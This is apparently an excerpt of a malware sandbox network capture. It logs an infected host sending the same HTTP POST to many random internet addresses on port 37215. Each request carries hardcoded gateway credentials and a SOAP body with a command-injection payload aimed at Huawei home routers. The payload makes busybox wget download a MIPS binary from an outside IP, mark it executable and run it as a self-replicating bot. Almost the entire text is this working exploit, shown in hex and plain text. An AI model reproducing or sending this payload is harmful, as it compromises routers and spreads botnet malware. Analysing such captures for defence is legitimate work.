6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  754192.168.2.1336344160.240.133.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347632885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  755192.168.2.134020841.109.14.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347703934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  756192.168.2.134126441.111.130.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347739935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  757192.168.2.1339244157.29.121.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347764015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  758192.168.2.134098641.233.238.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347768068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  759192.168.2.1358318157.147.151.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347786903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  760192.168.2.1348028131.210.212.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347786903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  761192.168.2.136079062.192.91.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347805977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  762192.168.2.1357228157.54.213.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347819090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  763192.168.2.1334692197.161.0.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.347822905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  764192.168.2.1337476157.85.23.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.348062038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
